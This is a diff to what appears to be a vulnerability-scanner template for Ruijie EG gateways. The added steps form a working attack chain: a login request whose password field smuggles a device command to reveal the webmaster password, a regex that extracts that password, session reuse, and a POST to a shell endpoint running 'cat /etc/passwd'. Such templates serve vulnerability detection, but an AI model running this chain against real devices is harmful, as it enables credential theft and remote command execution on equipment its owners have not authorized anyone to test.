--- a/vulnerabilities/other/ruijie-eg-rce.yaml
+++ b/vulnerabilities/other/ruijie-eg-rce.yaml
@@ -11,22 +11,48 @@ info:
 requests:
   - raw:
       - |
+        POST /login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 49
+        Content-Type: application/x-www-form-urlencoded
+        X-Requested-With: XMLHttpRequest
+
+        username=admin&password=admin?show+webmaster+user
+
+      - |
+        POST /login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 49
+        Content-Type: application/x-www-form-urlencoded
+        X-Requested-With: XMLHttpRequest
+
+        username=admin&password={{admin}}
+
+      - |
         POST /cli.php?a=shell HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
         Content-Type: application/x-www-form-urlencoded;charset=UTF-8
         Content-Length: 111
 
         notdelay=true&command=cat /etc/passwd
 
+    cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: regex
         regex:
           - "root:.*:0:0"
-          - "nobody:x:0:0:"
+          - "nobody:.*:0:0"
         part: body
 
       - type: status
         status:
           - 200
+
+    extractors:
+      - type: regex
+        name: admin
+        group: 1
+        internal: true
+        regex:
+          - 'admin ([a-zA-Z0-9#@]+)",'
